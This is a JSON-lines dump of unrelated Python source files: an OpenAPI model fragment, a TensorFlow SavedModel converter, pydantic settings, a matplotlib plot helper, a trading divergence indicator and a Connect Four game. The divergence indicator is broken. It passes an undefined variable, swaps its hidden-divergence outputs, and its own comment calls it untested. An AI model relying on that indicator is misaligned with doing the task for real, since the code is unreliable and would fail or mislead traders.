_configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n self.attributes = attributes\n self.id = id\n self.type = type\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n if var_name in self.read_only_vars:\n raise ApiAttributeError(f\"`{var_name}` is a read-only attribute. 
Use `from_openapi_data` to instantiate \"\n f\"class with read only attributes.\")\n"} {"ext": "py", "sha": "1a314d37754d75b258b2bd144ecbd45e4d9d7b60", "content": "import tensorflow as tf\nimport os\nimport shutil\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python import ops\n\ndef get_graph_def_from_file(graph_filepath):\n tf.compat.v1.reset_default_graph()\n with ops.Graph().as_default():\n with tf.compat.v1.gfile.GFile(graph_filepath, 'rb') as f:\n graph_def = tf.compat.v1.GraphDef()\n graph_def.ParseFromString(f.read())\n return graph_def\n\ndef convert_graph_def_to_saved_model(export_dir, graph_filepath, input_name, outputs):\n graph_def = get_graph_def_from_file(graph_filepath)\n with tf.compat.v1.Session(graph=tf.Graph()) as session:\n tf.import_graph_def(graph_def, name='')\n tf.compat.v1.saved_model.simple_save(\n session,\n export_dir,# change input_image to node.name if you know the name\n inputs={input_name: session.graph.get_tensor_by_name('{}:0'.format(node.name))\n for node in graph_def.node if node.op=='Placeholder'},\n outputs={t.rstrip(\":0\"):session.graph.get_tensor_by_name(t) for t in outputs}\n )\n print('Optimized graph converted to SavedModel!')\n\ntf.compat.v1.enable_eager_execution()\n\n# convert this to a TF Serving compatible mode\nshutil.rmtree('./saved_model', ignore_errors=True)\nconvert_graph_def_to_saved_model('./saved_model', './v3-large_224_1.0_float.pb', 'input', ['MobilenetV3/Predictions/Softmax:0'])\n"} {"ext": "py", "sha": "1a314e28488f9b07a7c7751d6a0cd3b1d438f780", "content": "\"\"\"\nContains settings used elsewhere in the library.\n\"\"\"\n\nfrom typing import Literal\nfrom pathlib import Path\nfrom pydantic import BaseSettings, DirectoryPath, FilePath\nfrom dotenv import load_dotenv, find_dotenv\n\n# find the first file named \".env\" in the current directory or a parent directory\nload_dotenv(dotenv_path=find_dotenv(filename='.env'))\n\nENCOMP_BASE = Path(__file__).parent.resolve()\n\n\nclass Settings(BaseSettings):\n \"\"\"\n Settings class.\n\n Use an ``.env``-file to override the defaults.\n The ``.env``-file is located using ``dotenv.find_dotenv(filename='.env')``, this will find a\n file in the directory of the running Python process or in a parent directory.\n\n The variables in the ``.env``-file have the same names (not case-sensitive)\n as the attributes of this class, with the additional prefix ``ENCOMP_``.\n In case of invalid values in the ``.env``-file or environment variables,\n a ``ValidationError`` is raised.\n\n .. note::\n\n Names that are defined as global environment variables (either on the system\n or user level) take precedence over names in the ``.env``-file.\n The global environment variables are loaded even if no ``.env``-file was found.\n\n * ``DATA_DIRECTORY``: path to a directory with auxiliary data\n * ``ADDITIONAL_UNITS``: path to a file with additional unit definitions for ``pint``\n * ``TYPE_CHECKING``: whether to check parameter and return value types of the core\n library function. 
This does not impact user-defined functions, the\n ``typeguard.typechecked`` decorator must be used explicitly\n * ``TYPESET_SYMBOL_SCRIPTS``: whether to typeset Sympy symbol sub- and superscripts\n * ``IGNORE_NDARRAY_UNIT_STRIPPED_WARNING``: whether to suppress the ``pint`` warning\n when converting Quantity to Numpy array.\n * ``MATPLOTLIB_NOTEBOOK_FORMAT``: figure format for Matplotlib figures in Jupyter Notebooks\n * ``AUTOCONVERT_OFFSET_TO_BASEUNIT``: whether to automatically convert offset units in calculations. If this is False, °C must be converted to K before multiplication (for example)\n * ``DEFAULT_UNIT_FORMAT``: default unit format for ``Quantity`` objects: one of ``~P`` (compact), ``~L`` (Latex), ``~H`` (HTML), ``~Lx`` (Latex with SIUNITX package)\n\n .. note::\n All names are case-insensitive.\n\n \"\"\"\n\n data_directory: DirectoryPath = ENCOMP_BASE / 'data'\n additional_units: FilePath = data_directory / 'additional-units.txt'\n\n type_checking: bool = False\n typeset_symbol_scripts: bool = True\n ignore_ndarray_unit_stripped_warning: bool = True\n\n matplotlib_notebook_format: Literal['retina', 'png', 'svg'] = 'retina'\n autoconvert_offset_to_baseunit: bool = True\n default_unit_format: Literal['~P', '~L', '~H', '~Lx'] = '~P'\n\n class Config:\n env_prefix = 'ENCOMP_'\n env_file = '.env'\n env_file_encoding = 'utf-8'\n case_sensitive = False\n\n\n# the settings object is initialized the first time the library loads\n# settings can be changed during runtime by setting attributes on this instance\nSETTINGS = Settings()\n"} {"ext": "py", "sha": "1a314e5da8e0a761183714313da99566115a9b63", "content": "# -*- coding: utf-8 -*-\n\nfrom matplotlib.patches import Patch\nfrom matplotlib.pyplot import axis, legend\n\nfrom ....Functions.init_fig import init_fig\nfrom ....definitions import config_dict\n\nMAGNET_COLOR = config_dict[\"PLOT\"][\"COLOR_DICT\"][\"MAGNET_COLOR\"]\n\n\ndef plot(self, fig=None, display_magnet=True):\n \"\"\"Plot the Hole in a matplotlib fig\n\n Parameters\n ----------\n self : Hole\n A Hole object\n fig :\n if None, open a new fig and plot, else add to the current\n one (Default value = None)\n display_magnet : bool\n if True, plot the magnet inside the hole, if there is any (Default value = True)\n\n Returns\n -------\n None\n \"\"\"\n display = fig is None\n if display:\n color = \"k\"\n else:\n color = \"w\"\n\n surf_hole = self.build_geometry()\n patches = list()\n for surf in surf_hole:\n if \"Magnet\" in surf.label and display_magnet:\n patches.extend(surf.get_patches(color=MAGNET_COLOR))\n else:\n patches.extend(surf.get_patches(color=color))\n\n # Display the result\n (fig, axes, patch_leg, label_leg) = init_fig(fig)\n axes.set_xlabel(\"(m)\")\n axes.set_ylabel(\"(m)\")\n axes.set_title(\"Hole\")\n\n # Add all the hole (and magnet) to fig\n for patch in patches:\n axes.add_patch(patch)\n\n # Axis Setup\n axis(\"equal\")\n Lim = self.get_Rbo() * 1.2\n axes.set_xlim(-Lim, Lim)\n axes.set_ylim(-Lim, Lim)\n\n if display_magnet and \"Magnet\" in [surf.label for surf in surf_hole]:\n patch_leg.append(Patch(color=MAGNET_COLOR))\n label_leg.append(\"Magnet\")\n legend(patch_leg, label_leg)\n fig.show()\n"} {"ext": "py", "sha": "1a314ed7e98779b54d32d41ecc3dcb9d4a4be264", "content": "from jesse.helpers import get_candle_source, slice_candles, np_shift, same_length\nimport numpy as np\nfrom numba import njit,jit\nimport talib \nfrom typing import Union\nfrom jesse.helpers import get_config\nfrom collections import namedtuple\nimport tulipy as ti\nimport math 
\n\n\"\"\"\nhttps://www.tradingview.com/script/sxZRzQzQ-Divergence-Indicator-any-oscillator/#chart-view-comment-form\nPossibly Accurate, needs more testing\n\"\"\"\n#jesse backtest '2021-01-03' '2021-03-02'\n\nDIVERGENCES = namedtuple('Divergences',['bearCond', 'bullCond', 'hiddenBullCond','hiddenBearCond'])\n\ndef divergence(candles: np.ndarray, lbR:int=2, lbL:int=2, rangeUpper:int=200, rangeLower:int=0,source_type: str = \"close\", sequential: bool = False) -> DIVERGENCES:\n candles = slice_candles(candles, sequential) \n source1 = get_candle_source(candles, source_type=source_type) \n bearCond, bullCond, hiddenBullCond, hiddenBearCond = fast_div(source,source,candles,lbR,lbL,rangeUpper,rangeLower)\n if sequential:\n return DIVERGENCES(bearCond,bullCond,hiddenBearCond,hiddenBullCond)\n else:\n return DIVERGENCES(bearCond[-1],bullCond[-1],hiddenBearCond[-1],hiddenBullCond[-1])\n \n \ndef fast_div(source1,source,candles,r,l,rangeUpper,rangeLower): \n highmiddlesource = np.full_like(source1,0)\n lowmiddlesource = np.full_like(source1,0)\n pivothigh = np.full_like(source1,0)\n pivotlow = np.full_like(source1,0)\n lastpivothighprice = np.full_like(source1,0)\n lastpivotlowprice = np.full_like(source1,0)\n priceslowest = np.full_like(source1,np.nan)\n priceshighest = np.full_like(source1,np.nan)\n priceshigh = np.full_like(source1,np.nan)\n priceslow = np.full_like(source1,np.nan)\n highindices = np.full_like(source1,np.nan)\n lowindices = np.full_like(source1,np.nan)\n ivar = np.full_like(source1,0)\n for i in range(source1.shape[0]):\n highmiddlesource[i] = source[i-r]\n lowmiddlesource[i] = source[i-l]\n if (np.all(highmiddlesource[i] >= source[i-(l+r):i-(r)]) and np.all(highmiddlesource[i] > source[i-(r-1):i+1])):\n pivothigh[i] = 1 \n lastpivothighprice[i] = highmiddlesource[i] \n else:\n pivothigh[i] = 0 \n lastpivothighprice[i] = lastpivothighprice[i-1]\n if (np.all(lowmiddlesource[i] <= source[i-(l+r):i-(r)]) and np.all(lowmiddlesource[i] < source[i-(r-1):i+1])): \n pivotlow[i] = 1 \n lastpivotlowprice[i] = lowmiddlesource[i] \n else:\n pivotlow[i] = 0 \n lastpivotlowprice[i] = lastpivotlowprice[i-1]\n if pivothigh[i] == 1:\n priceshigh[i] = source[i-r] \n priceshighest[i] = candles[:,3][i-r]\n highindices[i] = (i-r) \n if pivotlow[i] == 1:\n priceslow[i] = source[i-l] \n priceslowest[i] = candles[:,4][i-l]\n lowindices[i] = (i-l)\n ivar[i] = i\n ivar1 = int(ivar[-1])\n priceshigh = priceshigh[~np.isnan(priceshigh)]\n priceshigh = np.concatenate((np.full((source.shape[0] - priceshigh.shape[0]), np.nan), priceshigh)) \n priceshighest = priceshighest[~np.isnan(priceshighest)]\n priceshighest = np.concatenate((np.full((source.shape[0] - priceshighest.shape[0]), np.nan), priceshighest)) \n priceslow = priceslow[~np.isnan(priceslow)]\n priceslow = np.concatenate((np.full((source.shape[0] - priceslow.shape[0]), np.nan), priceslow)) \n priceslowest = priceslowest[~np.isnan(priceslowest)]\n priceslowest = np.concatenate((np.full((source.shape[0] - priceslowest.shape[0]), np.nan), priceslowest)) \n highindices = highindices[~np.isnan(highindices)]\n highindices = np.concatenate((np.full((source.shape[0] - highindices.shape[0]), np.nan), highindices)) \n lowindices = lowindices[~np.isnan(lowindices)]\n lowindices = np.concatenate((np.full((source.shape[0] - lowindices.shape[0]), np.nan), lowindices)) \n oscHL = 1 if source[-(r+1)] > priceslow[-2] and (np.abs(lowindices[-2]-ivar1) >= rangeLower and np.abs(lowindices[-2]-ivar1) <= rangeUpper) else 0 \n priceLL = 1 if candles[:,4][-(r+1)] < 
priceslowest[-2] else 0 \n bullCond = 1 if priceLL == 1 and oscHL == 1 and pivotlow[-1] == 1 else 0 \n oscLL = 1 if (source[-(r+1)] < priceslow[-2] and np.abs(lowindices[-2]-ivar1) >= rangeLower and np.abs(lowindices[-2]-ivar1) <= rangeUpper) else 0 \n priceHL = 1 if candles[:,4][-(r+1)] > priceslowest[-2] else 0 \n hiddenBullCond = 1 if priceHL == 1 and oscLL == 1 and pivotlow[-1] == 1 else 0 \n oscLH = 1 if source[-(r+1)] < priceshigh[-2] and (np.abs(highindices[-2]-ivar1) >= rangeLower and np.abs(highindices[-2]-ivar1) <= rangeUpper) else 0 \n priceHH = 1 if candles[:,3][-(r+1)] > priceshighest[-2] else 0 \n bearCond = 1 if priceHH == 1 and oscLH == 1 and pivothigh[-1] == 1 else 0 \n oscHH = 1 if source[-(r+1)] > priceshigh[-2] and (np.abs(highindices[-2]-ivar1) >= rangeLower and np.abs(highindices[-2]-ivar1) <= rangeUpper) else 0 \n priceLH = 1 if candles[:,3][-(r+1)] < priceshighest[-2] else 0 \n hiddenBearCond = 1 if priceLH == 1 and oscHH == 1 and pivothigh[-1] == 1 else 0 \n return bearCond, bullCond, hiddenBullCond, hiddenBearCond \n"} {"ext": "py", "sha": "1a314f29f5c821bd4517f8b3972bb56000ac2620", "content": "from enum import Enum\nfrom itertools import takewhile\n\nfrom grid import Grid, Point\n\nimport grid_utils\n\nclass DiscState(Enum):\n empty = 0\n red = 1\n black = 2\n\nclass Game(object):\n\n def __init__(self, initial_grid=None):\n self.restart(initial_grid)\n\n def restart(self, initial_grid=None):\n if initial_grid is None:\n self.grid = Grid(6, # Rows\n 7, # Cols\n initial_value=DiscState.empty)\n else:\n self.grid = initial_grid\n self.current_player = DiscState.red\n self.winner = None\n self.is_end = False\n\n def try_turn(self, color, col_index):\n added_point = self.try_move(color, col_index)\n if added_point is not None:\n winner = self.get_winner(added_point, self.current_player)\n if winner:\n self.winner = winner\n self.is_end = True\n return True\n else:\n if not self.is_board_full():\n self.switch_player()\n else:\n # Tie game\n self.is_end = True\n return True\n return False\n\n def try_move(self, color, col_index):\n if self.current_player is not color:\n return None\n if not self.can_add_disc(col_index):\n return None\n return self.add_disc(col_index, self.current_player)\n\n def switch_player(self):\n if self.current_player is DiscState.red:\n self.current_player = DiscState.black\n else:\n self.current_player = DiscState.red\n\n def is_board_full(self):\n for col_index in range(self.grid.width):\n if self.can_add_disc(col_index):\n return False\n return True\n\n def can_add_disc(self, col_index):\n if col_index >= self.grid.width:\n return False\n return self.grid[-1][col_index] is DiscState.empty\n\n def add_disc(self, col_index, color):\n for row_index in range(self.grid.height):\n if self.grid[row_index][col_index] is DiscState.empty:\n self.grid[row_index][col_index] = color\n return Point(row_index, col_index)\n break\n else:\n raise ValueError(\"column %i is full\" % col_index)\n\n def get_winner(self, last_move, current_player, row_size=4):\n assert self.grid.at(last_move) is not DiscState.empty\n if grid_utils.is_in_row_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_col_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_diag_down_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_diag_up_run(self.grid, last_move, row_size):\n return current_player\n return None\n\n def render_board(self):\n str_repr = [\"Current board state:\\n\"]\n str_repr += [\" %i \" % col_index for col_index in range(self.grid.width)] + 
[\"\\n\"]\n for row in reversed(self.grid):\n row_repr = []\n for disc_value in row:\n if disc_value is DiscState.empty:\n row_repr.append(\"| |\")\n elif disc_value is DiscState.red:\n row_repr.append(\"|O|\")\n else: # disc_value is black\n row_repr.append(\"|X|\")\n row_repr.append(\"\\n\")\n str_repr += row_repr\n print(\"\".join(str_repr))\n"}